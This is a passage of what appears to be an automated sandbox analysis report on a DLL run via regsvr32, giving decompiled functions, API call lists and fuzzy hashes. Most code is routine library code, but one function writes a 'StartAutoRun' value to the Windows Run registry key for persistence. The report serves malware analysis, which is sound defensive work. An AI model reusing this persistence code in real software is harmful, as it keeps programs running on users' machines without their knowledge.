							_t77 = _t77 + 0xc;
						}
						goto L11;
					}
					_t42 =  *_t38();
					_t84 = (_t42 & 0x000003ff) - 0x11;
					if((_t42 & 0x000003ff) == 0x11 && E1003835D(_t51, "MS UI Gothic", _t66, _t84) != 0) {
						asm("sbb eax, eax");
						_t39 = FindResourceExA(_v8, 5, ( ~_t72 & 0x0000000e) + 0x3ee, 0xfc11);
						if(_t39 != 0) {
							goto L9;
						}
					}
					goto L8;
				}
			}























                                                                                                                0x1003840a
                                                                                                                0x1003840a
                                                                                                                0x1003840a
                                                                                                                0x1003840d
                                                                                                                0x1003840e
                                                                                                                0x1003840f
                                                                                                                0x1003841e
                                                                                                                0x10038420
                                                                                                                0x10038422
                                                                                                                0x10038424
                                                                                                                0x10038424
                                                                                                                0x10038429
                                                                                                                0x1003842e
                                                                                                                0x10038528
                                                                                                                0x1003852e
                                                                                                                0x10038533
                                                                                                                0x1003853a
                                                                                                                0x1003854a
                                                                                                                0x10038434
                                                                                                                0x10038434
                                                                                                                0x1003843f
                                                                                                                0x10038446
                                                                                                                0x10038449
                                                                                                                0x100384e4
                                                                                                                0x100384e4
                                                                                                                0x100384f0
                                                                                                                0x100384f6
                                                                                                                0x100384fa
                                                                                                                0x10038500
                                                                                                                0x10038502
                                                                                                                0x10038505
                                                                                                                0x10038507
                                                                                                                0x10038507
                                                                                                                0x10038515
                                                                                                                0x10038523
                                                                                                                0x00000000
                                                                                                                0x10038527
                                                                                                                0x1003844f
                                                                                                                0x10038461
                                                                                                                0x10038469
                                                                                                                0x10038471
                                                                                                                0x100384ad
                                                                                                                0x100384af
                                                                                                                0x100384bc
                                                                                                                0x100384c4
                                                                                                                0x100384e3
                                                                                                                0x100384e3
                                                                                                                0x00000000
                                                                                                                0x100384e3
                                                                                                                0x100384c6
                                                                                                                0x100384ca
                                                                                                                0x100384d0
                                                                                                                0x100384d2
                                                                                                                0x100384db
                                                                                                                0x100384e0
                                                                                                                0x100384e0
                                                                                                                0x00000000
                                                                                                                0x100384d2
                                                                                                                0x10038473
                                                                                                                0x10038479
                                                                                                                0x1003847d
                                                                                                                0x10038491
                                                                                                                0x100384a3
                                                                                                                0x100384ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100384ab
                                                                                                                0x00000000
                                                                                                                0x1003847d

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002D1BB: __EH_prolog3_catch.LIBCMT ref: 1002D1C2
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00000000,?,100383EC,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 10038455
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 10038461
                                                                                                                • FindResourceExA.KERNEL32(00000000,00000005,?,0000FC11), ref: 100384A3
                                                                                                                • FindResourceA.KERNEL32 ref: 100384BC
                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 100384CA
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,100383EC,?,?,?,1002BE8A,?,?,?,00000000,0000001C,1002BFB6,00000000,?), ref: 100384FA
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Find$AddressAllocException@8GlobalH_prolog3H_prolog3_catchHandleLoadModuleProcThrow
                                                                                                                • String ID: GetUserDefaultUILanguage$KERNEL32.DLL$MS UI Gothic
                                                                                                                • API String ID: 202444263-1344381877
                                                                                                                • Opcode ID: b4e2ec52a72eaebb105ac3bd8e120d6ee241f876f7a443ae72377c137d8db2f1
                                                                                                                • Instruction ID: 67b46749c551dcd9ece66a837ccf3ef5942c46c94da6440fc3541c2bdf937fd4
                                                                                                                • Opcode Fuzzy Hash: b4e2ec52a72eaebb105ac3bd8e120d6ee241f876f7a443ae72377c137d8db2f1
                                                                                                                • Instruction Fuzzy Hash: DB31E579A00311AFEB11DF60DC86EAA37A8EF44751F058069FC09CF291EA34EE81C760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B45F Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1001B45F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E1003D219(E10052FB4, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E10019C16(1, _t60, _t71,  *(_t71 + 0x14));
					E1001B373(_t60, E10019C16(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E1001B3E9(1, _t66, E10019C16(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E100188D8(E10019C16(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E1001A22F(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E1003D2BE( *(_t71 - 0x14));
			}













                                                                                                                0x1001b45f
                                                                                                                0x1001b45f
                                                                                                                0x1001b45f
                                                                                                                0x1001b466
                                                                                                                0x1001b46b
                                                                                                                0x1001b46e
                                                                                                                0x1001b475
                                                                                                                0x1001b47b
                                                                                                                0x1001b47f
                                                                                                                0x1001b483
                                                                                                                0x1001b48b
                                                                                                                0x1001b48c
                                                                                                                0x1001b48f
                                                                                                                0x1001b538
                                                                                                                0x1001b54a
                                                                                                                0x00000000
                                                                                                                0x1001b495
                                                                                                                0x1001b495
                                                                                                                0x1001b498
                                                                                                                0x1001b530
                                                                                                                0x1001b54f
                                                                                                                0x1001b551
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001b49a
                                                                                                                0x1001b49a
                                                                                                                0x1001b49d
                                                                                                                0x1001b4f6
                                                                                                                0x1001b4fe
                                                                                                                0x1001b50c
                                                                                                                0x00000000
                                                                                                                0x1001b49f
                                                                                                                0x1001b4a4
                                                                                                                0x1001b553
                                                                                                                0x1001b566
                                                                                                                0x1001b4aa
                                                                                                                0x1001b4bb
                                                                                                                0x1001b4d8
                                                                                                                0x1001b4e0
                                                                                                                0x1001b4e0
                                                                                                                0x1001b4a4
                                                                                                                0x1001b49d
                                                                                                                0x1001b498
                                                                                                                0x1001b4ed

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001B466
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001B475
                                                                                                                • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001B4CF
                                                                                                                  • Part of subcall function 1001A22F: GetWindowRect.USER32 ref: 1001A257
                                                                                                                  • Part of subcall function 1001A22F: GetWindow.USER32(?,00000004), ref: 1001A274
                                                                                                                • SetWindowLongA.USER32 ref: 1001B4F6
                                                                                                                • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001B4FE
                                                                                                                • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001B505
                                                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001B50C
                                                                                                                  • Part of subcall function 100188D8: GetWindowRect.USER32 ref: 100188E4
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001B560
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 2702501687-1060338832
                                                                                                                • Opcode ID: b3b26bc1989b91077657b4700a70c313c633de35d29dc9d8617e35590db8554f
                                                                                                                • Instruction ID: 6745bc68f29073eb744064efea3e3c24a42fec2ac1e681f38e254d8674a0d3fa
                                                                                                                • Opcode Fuzzy Hash: b3b26bc1989b91077657b4700a70c313c633de35d29dc9d8617e35590db8554f
                                                                                                                • Instruction Fuzzy Hash: 7331807680051AAFDF01DFE4DD89EBF3AB9EF09301F004115F601AB062DB35DA909BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10026AEE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10026AEE() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1006d324; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1006d324);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1006d324; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                                                                0x10026aef
                                                                                                                0x10026af7
                                                                                                                0x10026b1e
                                                                                                                0x10026b20
                                                                                                                0x10026b37
                                                                                                                0x10026b3b
                                                                                                                0x10026b41
                                                                                                                0x10026b41
                                                                                                                0x10026b4f
                                                                                                                0x10026b57
                                                                                                                0x10026b5e
                                                                                                                0x10026b61
                                                                                                                0x10026b61
                                                                                                                0x10026b69
                                                                                                                0x10026b6f
                                                                                                                0x00000000
                                                                                                                0x10026b77
                                                                                                                0x10026b79

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 10026B00
                                                                                                                • GetSystemMetrics.USER32 ref: 10026B24
                                                                                                                • CreateFontA.GDI32(00000000,?,?,?,?,?,10027C49,?,?,?,?,?,?,?), ref: 10026B2B
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 10026B3F
                                                                                                                • GetCharWidthA.GDI32(00000000,00000036,00000036,1006D324), ref: 10026B4F
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 10026B5E
                                                                                                                • DeleteObject.GDI32(00000000), ref: 10026B61
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 10026B69
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                                • String ID: Marlett
                                                                                                                • API String ID: 1397664628-3688754224
                                                                                                                • Opcode ID: 4c2ac4db1c1f23029f9fd7ee94168f935361a3d70fb4354e594fd1e23e8ef388
                                                                                                                • Instruction ID: 312bde09171b4c5a86fc007af76adbc0d65994d8a33d49adcc0c1b8b05bb4233
                                                                                                                • Opcode Fuzzy Hash: 4c2ac4db1c1f23029f9fd7ee94168f935361a3d70fb4354e594fd1e23e8ef388
                                                                                                                • Instruction Fuzzy Hash: 990175719422307BE3719B26AC8CD9F7EADEF4EBF1F400515F20992190C7254940C6B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100429EC Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E100429EC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t39;
				void* _t40;

				_push(0xc);
				_push(0x10068f80);
				E1003D578(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t40 - 0x1c) = _t20;
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x1006e988;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				if(_t20 != 0) {
					 *((intOrPtr*)(_t39 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
					 *((intOrPtr*)(_t39 + 0x1fc)) = GetProcAddress( *(_t40 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x1006dfe0;
				InterlockedIncrement(0x1006dfe0);
				E1004329E(0xc);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x1006e5e8; // 0x1006e510
					 *((intOrPtr*)(_t39 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t39 + 0x6c)));
				E10044C34();
				 *(_t40 - 4) = 0xfffffffe;
				return E1003D5BD(E10042A97());
			}








                                                                                                                0x100429ec
                                                                                                                0x100429ee
                                                                                                                0x100429f3
                                                                                                                0x100429fd
                                                                                                                0x10042a03
                                                                                                                0x10042a06
                                                                                                                0x10042a09
                                                                                                                0x10042a13
                                                                                                                0x10042a18
                                                                                                                0x10042a28
                                                                                                                0x10042a38
                                                                                                                0x10042a38
                                                                                                                0x10042a3e
                                                                                                                0x10042a41
                                                                                                                0x10042a48
                                                                                                                0x10042a54
                                                                                                                0x10042a58
                                                                                                                0x10042a60
                                                                                                                0x10042a66
                                                                                                                0x10042a6a
                                                                                                                0x10042a6d
                                                                                                                0x10042a72
                                                                                                                0x10042a74
                                                                                                                0x10042a79
                                                                                                                0x10042a79
                                                                                                                0x10042a7c
                                                                                                                0x10042a7f
                                                                                                                0x10042a85
                                                                                                                0x10042a96

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10068F80,0000000C,10042AFE,00000000,00000000,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7), ref: 100429FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE), ref: 10042A26
                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE), ref: 10042A36
                                                                                                                • InterlockedIncrement.KERNEL32(1006DFE0), ref: 10042A58
                                                                                                                • __lock.LIBCMT ref: 10042A60
                                                                                                                • ___addlocaleref.LIBCMT ref: 10042A7F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 1036688887-2843748187
                                                                                                                • Opcode ID: c8ac78e0f49025fdcf952466aae8be47cf5ffca1bb4c7d7a7b32397d64ecb710
                                                                                                                • Instruction ID: 39933159fc6c4172093701dcbc24d09404a48d515a1d8b9df063bbdc0396ed4e
                                                                                                                • Opcode Fuzzy Hash: c8ac78e0f49025fdcf952466aae8be47cf5ffca1bb4c7d7a7b32397d64ecb710
                                                                                                                • Instruction Fuzzy Hash: 0C11A1B5900B419FE760DF79CC44B9ABBF0EF04304F50492AE99AD7260CB74AA41CF25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100360D5 Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100360D5(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x20), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x20),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x80) & 0x00000400) != 0) {
						SetRect( &_v24, _t66 -  *0x10070c80, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x10070c80, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x80) & 0x00000800) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x10070c84, _t66, _t43);
						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x10070c84, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                                                                                                                0x100360dc
                                                                                                                0x100360e3
                                                                                                                0x100360ea
                                                                                                                0x100360f4
                                                                                                                0x10036102
                                                                                                                0x10036108
                                                                                                                0x1003610e
                                                                                                                0x10036111
                                                                                                                0x10036117
                                                                                                                0x1003611c
                                                                                                                0x1003611f
                                                                                                                0x10036122
                                                                                                                0x10036125
                                                                                                                0x10036141
                                                                                                                0x10036150
                                                                                                                0x10036167
                                                                                                                0x10036176
                                                                                                                0x1003617c
                                                                                                                0x1003617f
                                                                                                                0x1003617f
                                                                                                                0x10036184
                                                                                                                0x100361a6
                                                                                                                0x100361b1
                                                                                                                0x100361c8
                                                                                                                0x100361d3
                                                                                                                0x100361d3
                                                                                                                0x00000000
                                                                                                                0x100361d9
                                                                                                                0x100361dd

                                                                                                                APIs
                                                                                                                • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 100360EA
                                                                                                                • GetWindowRect.USER32 ref: 10036102
                                                                                                                • SetRect.USER32 ref: 10036141
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 10036150
                                                                                                                • SetRect.USER32 ref: 10036167
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 10036176
                                                                                                                • SetRect.USER32 ref: 100361A6
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 100361B1
                                                                                                                • SetRect.USER32 ref: 100361C8
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 100361D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Invalidate$Window$Proc
                                                                                                                • String ID:
                                                                                                                • API String ID: 570070710-0
                                                                                                                • Opcode ID: c66c87a2f9a5546e65306e23b650eeb7f5bf2d703e939f4f0808907c358abcdc
                                                                                                                • Instruction ID: bd618f862e839b5d7029390d9d1a8aa06711ed5474499157b0c9b14728c5a8f0
                                                                                                                • Opcode Fuzzy Hash: c66c87a2f9a5546e65306e23b650eeb7f5bf2d703e939f4f0808907c358abcdc
                                                                                                                • Instruction Fuzzy Hash: CC31FA72940519BFEB05CFA4CD88FAEBBB8FB08340F144215F905A75A0E770AA54CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100149F0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179registrywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E100149F0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __ebp, void* __eflags) {
				int _v4;
				char _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				char _v48;
				char _v228;
				char _v304;
				char _v312;
				char _v316;
				void* _v320;
				void* _v324;
				char* _v328;
				char* _v332;
				char _v348;
				void* __edi;
				void* __esi;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr* _t64;
				long _t74;
				void* _t77;
				signed int** _t79;
				intOrPtr* _t80;
				void* _t81;
				signed int _t136;
				signed int _t138;
				intOrPtr _t142;
				void* _t143;
				char* _t144;
				void* _t145;
				intOrPtr* _t147;
				void* _t148;
				int _t151;
				void* _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr* _t158;

				_t156 = __eflags;
				_t149 = __ebp;
				_t131 = __edx;
				_t100 = __ebx;
				_push(0xffffffff);
				_push(E1005280C);
				_push( *[fs:0x0]);
				_t153 = _t152 - 0x130;
				_t55 =  *0x1006dbdc; // 0xdf7c0cda
				_v16 = _t55 ^ _t153;
				_push(__ebp);
				_push(_t143);
				_t57 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t57 ^ _t153);
				 *[fs:0x0] =  &_v12;
				_t147 = __ecx;
				E100205E2( &_v304, __eflags);
				_push(0);
				_push(0x1001);
				_push("Setting\\Setting.dat");
				_v4 = 0;
				_t61 = E10020A24( &_v304, __edx, _t156);
				_t157 = _t61;
				if(_t61 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)(_v316 + 0x28))))(0, 0, 0);
					E10020058(__ebx,  &_v312,  *((intOrPtr*)(_v316 + 0x28)), _t143, _t147, _t157);
					_t142 =  *_t147;
					_t131 =  *((intOrPtr*)(_t142 + 8));
					_v44 = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t142 + 8))))( &_v328,  &_v328, 0, 0x1000, 0);
					E1001FEB3( &_v332, _t157);
					E10020580(__ebx,  &_v348);
					_v48 = 0;
					E1002001A(__ebx,  &_v332,  *((intOrPtr*)(_t142 + 8)), _t143, _t147, _t157);
				}
				GetModuleFileNameA(0,  &_v228, 0xc8);
				_t64 = E100173A6();
				_t158 = _t64;
				_t105 = 0 | _t158 == 0x00000000;
				if(_t158 == 0) {
					_t64 = E10001000(_t105, _t131, 0x80004005);
				}
				_v328 =  *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0xc))))() + 0x10;
				_v16 = 2;
				E10003500( &_v328, 0x100585c0,  &_v228);
				_t154 = _t153 + 0xc;
				E10005030( &_v328, _t149, "Software\\Microsoft\\Windows\\CurrentVersion\\Run");
				_v20 = 3;
				RegCreateKeyA(0x80000002, _v328,  &_v324);
				E1002B64F(_t100, _t147, _t147 + 0x154, _t143, _t149, _t147 + 0x154);
				_t74 = SendMessageA( *(_t147 + 0x34c), 0xf0, 0, 0);
				if(_t74 != 1) {
					RegDeleteValueA(_v320, "StartAutoRun");
					_t144 = _v328;
				} else {
					_t144 = _v328;
					_t151 =  *(_t144 - 0xc);
					if(( *(_t144 - 8) | _t74 -  *((intOrPtr*)(_t144 - 4))) < 0) {
						_push(0);
						E10001A40(_t100,  &_v328, _t144);
						_t144 = _v332;
					}
					RegSetValueExA(_v320, "StartAutoRun", 0, 1, _t144, _t151);
				}
				_t136 =  *( *_t147 + 0x60);
				_t77 =  *_t136();
				_t162 = _t77 - 1;
				if(_t77 != 1) {
					E1002181C(_t100, _t144, _t147, _t162, 0x10059a60, 0, 0);
				}
				_t79 = _v324 + 0xfffffff0;
				_v16 = 2;
				asm("lock xadd [ecx], edx");
				_t138 = (_t136 | 0xffffffff) - 1;
				if(_t138 <= 0) {
					_t138 =  *( *_t79);
					 *((intOrPtr*)( *((intOrPtr*)(_t138 + 4))))(_t79);
				}
				_t46 = _t144 - 0x10; // 0x7ffffff2
				_t80 = _t46;
				_v16 = 0;
				asm("lock xadd [ecx], edx");
				_t140 = (_t138 | 0xffffffff) - 1;
				_t164 = (_t138 | 0xffffffff) - 1;
				if((_t138 | 0xffffffff) - 1 <= 0) {
					_t140 =  *((intOrPtr*)( *_t80));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t80)) + 4))))(_t80);
				}
				_v16 = 0xffffffff;
				_t81 = E100206EF(_t100,  &_v316, _t140, _t144, _t147, _t164);
				 *[fs:0x0] = _v24;
				_pop(_t145);
				_pop(_t148);
				return E1003B437(_t81, _t100, _v28 ^ _t154, _t140, _t145, _t148);
			}












































                                                                                                                0x100149f0
                                                                                                                0x100149f0
                                                                                                                0x100149f0
                                                                                                                0x100149f0
                                                                                                                0x100149f0
                                                                                                                0x100149f2
                                                                                                                0x100149fd
                                                                                                                0x100149fe
                                                                                                                0x10014a04
                                                                                                                0x10014a0b
                                                                                                                0x10014a12
                                                                                                                0x10014a14
                                                                                                                0x10014a15
                                                                                                                0x10014a1c
                                                                                                                0x10014a24
                                                                                                                0x10014a2a
                                                                                                                0x10014a30
                                                                                                                0x10014a35
                                                                                                                0x10014a37
                                                                                                                0x10014a3c
                                                                                                                0x10014a45
